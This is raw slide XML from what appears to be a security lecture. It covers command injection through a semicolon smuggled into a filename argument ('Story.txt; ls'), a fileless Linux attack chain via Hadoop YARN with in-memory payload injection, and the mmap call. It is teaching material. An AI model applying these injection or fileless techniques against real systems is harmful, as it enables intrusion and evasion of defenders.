            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Non-writable Addresses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="7,903 reputation"/>
              </a:rPr>
              <a:t>Mark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3" tooltip="7,903 reputation"/>
              </a:rPr>
              <a:t>Plotnick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14143296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65</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2292400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66</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0282079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41884841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r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Supplementary Material</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="36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68</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>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26644461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buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>Real-world </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> Attack on Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Ben Nick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="32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69</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2253922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2675466"/>
            <a:ext cx="8856983" cy="3777869"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Used normally, the output is simply the contents of the file requested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>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catWrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Story.txt</a:t>
            </a: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When last we left our heroes</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endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>However, if we add a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>semicolon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>another command to the end of this line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, the command is executed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catWrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> with no complaint:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>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catWrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "Story.txt; ls"</a:t>
            </a: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When last we left our heroes...</a:t>
            </a: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Story.txt   </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doubFree.c</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nullpointer.c</a:t>
            </a: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301943" lvl="1"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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Attack Scenario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Weilin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Zhong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354855708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457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>An attacker infects a Hadoop cluster by identifying the service running on a well-known port (8088) and uses Hadoop YARN unauthenticated remote command execution support to achieve runtime access on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The attacker copies a file containing packed malware into a temp directory and launches </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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70</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Scenario (1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Ben Nick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22075957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457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The malicious process unpacks the file using shellcode to allocate a new dynamic executable region of memory in the process’s own memory space and injects an executable payload into the new memory region.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The malware then transfers execution to the injected ELF entry point.</a:t>
            </a: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71</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Scenario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Ben Nick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20892400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457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The malicious process deletes the original packed malware from disk to cover its tracks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The injected ELF payload contains a shellcode that listens for incoming TCP connections, transmitting the attacker’s instructions.</a:t>
            </a:r>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72</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Scenario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Ben Nick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31281843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b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mmap</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73</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7602229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2675467"/>
            <a:ext cx="8640959" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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#include &lt;sys/</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mman.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a: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void </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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(void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size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> length,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prot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flags,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off_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> offset); </a:t>
            </a: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endParaRPr lang="en-US" altLang="zh-TW"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int</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munmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(void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size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> length);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>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mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>man7.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</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74</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29603594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7524328" y="2675467"/>
            <a:ext cx="756072" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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75</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>How to use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dirty="0"/>
              <a:t> function in C language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Bamdeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Ghosh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://linuxhint.com/wp-content/uploads/2020/07/1-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0616"/>
            <a:ext cx="5789282" cy="3848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3542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7884368" y="2636912"/>
            <a:ext cx="792088" cy="3489251"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>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76</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>() System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Call             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Alan L. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Cox et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>l.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="m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99413"/>
            <a:ext cx="5450979" cy="3675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3255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a:t>creates a new mapping in the virtual address space of the calling process. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>starting address for the new mapping is specified in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dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> argument specifies the length of the mapping (which must be greater than 0). </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:b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77</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
